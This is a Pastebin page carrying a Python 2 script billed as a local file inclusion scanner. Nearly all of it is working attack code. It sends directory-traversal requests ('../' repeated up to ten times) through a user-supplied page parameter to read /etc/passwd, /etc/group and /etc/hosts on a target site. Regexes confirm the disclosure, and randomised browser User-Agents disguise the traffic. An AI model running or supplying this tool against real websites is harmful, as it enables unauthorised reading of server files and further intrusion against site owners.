Googleinurl

[SCRIPT] An0th3r LFI sC4Nn3r v1.0

Dec 11th, 2014
1,145
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env  python26
  2.  
  3. import optparse
  4. import sys
  5. import urllib2, socket
  6. import random
  7. import re
  8.  
  9. #
  10. # Banner aLFI
  11. banner = """
  12.                  $$\      $$$$$$$$\ $$$$$$\\
  13.                  $$ |      $$  _____|\_$$  _|
  14.         $$$$$$\ $$ |      $$ |        $$ |
  15.         \____$$\ $$ |      $$$$$\     $$ |
  16.         $$$$$$$ |$$ |      $$  __|     $$ |
  17.        $$  __$$ |$$ |      $$ |        $$ |
  18.        \$$$$$$$ |$$$$$$$$\ $$ |      $$$$$$\\
  19.         \_______|\________|\__|      \______|
  20.  
  21.  
  22.  
  23.         $$$$$$\\
  24.        $$  __$$\\
  25.        $$ /  \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\  $$$$$$\  $$$$$$\\
  26.        \$$$$$$\ $$  _____|\____$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\\
  27.         \____$$\ $$ /      $$$$$$$ |$$ |  $$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|
  28.        $$\  $$ |$$ |     $$  __$$ |$$ |  $$ |$$ |  $$ |$$   ____|$$ |
  29.        \$$$$$$  |\$$$$$$$\\$$$$$$$ |$$ |  $$ |$$ |  $$ |\$$$$$$$\ $$ |
  30.         \______/  \_______|\_______|\__|  \__|\__|  \__| \_______|\__|
  31.  
  32.                                                                 An0th3r LFI sC4Nn3r v1.0
  33.  
  34.                                Written by:
  35.  
  36.                              Claudio Viviani
  37.  
  38.                           http://www.homelab.it
  39.  
  40.                              info@homelab.it
  41.                           homelabit@protonmail.ch
  42.  
  43.                      https://www.facebook.com/homelabit
  44.                      https://twitter.com/homelabit
  45.                      https://plus.google.com/+HomelabIt1/
  46.            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  47. """
  48.  
  49.  
  50. commandList = optparse.OptionParser('usage: %prog -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent]\n')
  51. commandList.add_option('-u', '--url',
  52.                   action="store",
  53.                   dest="url",
  54.                   help="Insert URL: http[s]://www.victim.com",
  55.                   )
  56. commandList.add_option('-t', '--target',
  57.                   action="store",
  58.                   dest="target",
  59.                   help="Insert page: The name of the page to be scanned (Ex. index.php?page=)",
  60.                   )
  61. commandList.add_option('-p', '--port',
  62.                   action="store",
  63.                   dest="port",
  64.                   default=0,
  65.                   type="int",
  66.                   help="[Insert Port Number] - Default 80 or 443",
  67.                   )
  68. commandList.add_option('--timeout',
  69.                   action="store",
  70.                   dest="timeout",
  71.                   default=10,
  72.                   type="int",
  73.                   help="[Timeout Value] - Default 10",
  74.                   )
  75. commandList.add_option('-r', '--random-agent',
  76.                   action="store_true",
  77.                   dest="randomagent",
  78.                   default=False,
  79.                   help="[Set random UserAgent]",
  80.                   )
  81.  
  82.  
  83. options, remainder = commandList.parse_args()
  84.  
  85.  
  86. # Usage:
  87. if ( not options.url or not options.target):
  88.         print(banner)
  89.         print
  90.         commandList.print_help()
  91.         sys.exit(1)
  92. #
  93. # UserAgent list
  94. # Top UA 18/08/2014
  95. # http://techblog.willshouse.com/2012/01/03/most-common-user-agents/
  96. def randomAgentGen():
  97.  
  98.  userAgent =    ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  99.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  100.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
  101.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  102.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  103.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  104.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
  105.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  106.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  107.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
  108.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  109.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
  110.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  111.                 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  112.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  113.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  114.                 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  115.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  116.                 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  117.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  118.                 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  119.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  120.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  121.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  122.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  123.                 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  124.                 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  125.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  126.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  127.                 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  128.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
  129.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
  130.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
  131.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
  132.                 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
  133.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  134.                 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  135.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  136.                 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  137.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
  138.                 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
  139.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  140.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  141.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
  142.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  143.                 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  144.                 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  145.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  146.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  147.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  148.                 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
  149.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
  150.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
  151.                 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  152.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
  153.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
  154.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
  155.                 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  156.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
  157.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  158.                 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
  159.                 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  160.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  161.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  162.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
  163.                 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  164.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  165.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
  166.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  167.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
  168.                 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
  169.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
  170.                 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  171.                 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  172.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  173.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
  174.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
  175.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
  176.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
  177.  
  178.  if RANDOMAGENT:
  179.          UA = random.choice(userAgent)
  180.          headers = { 'User-Agent' : UA }
  181.  else:
  182.          UA = "Python-urllib/%s.%s" % sys.version_info[:2]
  183.          headers = { 'User-Agent' : UA }
  184.  
  185.  return headers
  186.  
  187. # File check list + regexp
  188. CHECK = dict()
  189. CHECK['etc/passwd'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:/[^:]*:/[^:]*)$'
  190. CHECK['etc/group'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*)$'
  191. CHECK['etc/hosts'] = '^(((([1]?\d)?\d|2[0-4]\d|25[0-5])\.){3}(([1]?\d)?\d|2[0-4]\d|25[0-5]))|([\da-fA-F]{1,4}(\:[\da-fA-F]{1,4}){7})|(([\da-fA-F]{1,4}:){0,5}::([\da-fA-F]{1,4}:){0,5}[\da-fA-F]{1,4})'
  192.  
  193. RANDOMAGENT = options.randomagent
  194. TIMEOUT = options.timeout
  195. URL = options.url
  196. PORT = options.port
  197. TARGET = options.target
  198.  
  199. if URL[0:8] == "https://":
  200.         PROTO = URL[0:8]
  201.         URL = URL[8:]
  202.         if URL.endswith("/"):
  203.                 URL = URL.replace("/","")
  204.         if PORT == 0:
  205.                 PORT = 443
  206.  
  207. elif URL[0:7] == "http://":
  208.         PROTO = URL[0:7]
  209.         URL = URL[7:]
  210.         if URL.endswith("/"):
  211.                 URL = URL.replace("/","")
  212.         if PORT == 0:
  213.                 PORT = 80
  214. else:
  215.         PROTO = "http://"
  216.         URL = options.url
  217.         if URL.endswith("/"):
  218.                 URL = URL.replace("/","")
  219.         if PORT == 0:
  220.                 PORT = 80
  221.  
  222. try:
  223.         #URL = socket.gethostbyname( URL )
  224.         socket.gethostbyname( URL )
  225.  
  226. except socket.gaierror:
  227.         #could not resolve
  228.         print 'Hostname could not be resolved. Exiting'
  229.         sys.exit()
  230.  
  231. headers = randomAgentGen()
  232.  
  233. print(banner)
  234. print
  235. print('[*] URL:\t'+PROTO+URL)
  236. print('[*] TARGET:\t'+TARGET)
  237. print('[*] PORT:\t'+str(PORT))
  238. print
  239.  
  240. found = 0
  241.  
  242. for  fileCheck, fileRegexp in CHECK.items():
  243.         FILE = fileCheck
  244.         REGEXP = fileRegexp
  245.         checkValidRegexp = re.compile(REGEXP, re.IGNORECASE)
  246.  
  247.         for scanLFI in range(1, 11):
  248.  
  249.                 PATHTRAV = "../"
  250.  
  251.                 PATHTRAV = PATHTRAV * scanLFI
  252.  
  253.                 try:
  254.                         req = urllib2.Request(PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE, None, headers)
  255.                         connection = urllib2.urlopen(req, None, TIMEOUT)
  256.                         response = connection.readlines()
  257.                         getcode = connection.getcode()
  258.  
  259.                         sentinel = 0
  260.                         for checkResponse in response:
  261.                                 #if (getcode == 200 and response != ""):
  262.                                 if (getcode == 200 and checkValidRegexp.match(checkResponse)):
  263.                                         sentinel = sentinel + 1
  264.  
  265.                         if sentinel > 1:
  266.                                 print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE+'\t <--- FOUND')
  267.                                 found = found + 1
  268.                         else:
  269.                                 print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE)
  270.  
  271.                 # HTTP error - 4xx, 5xx
  272.                 except urllib2.HTTPError:
  273.                         print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE)
  274.  
  275.                 # Connection error - Connection refused, No route to host
  276.                 except urllib2.URLError:
  277.                         print('Can\'t connect to host: '+PROTO+URL+' on port '+str(PORT))
  278.                         sys.exit()
  279.  
  280. if found < 1:
  281.         print
  282.         print('[+] Nothing found')
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×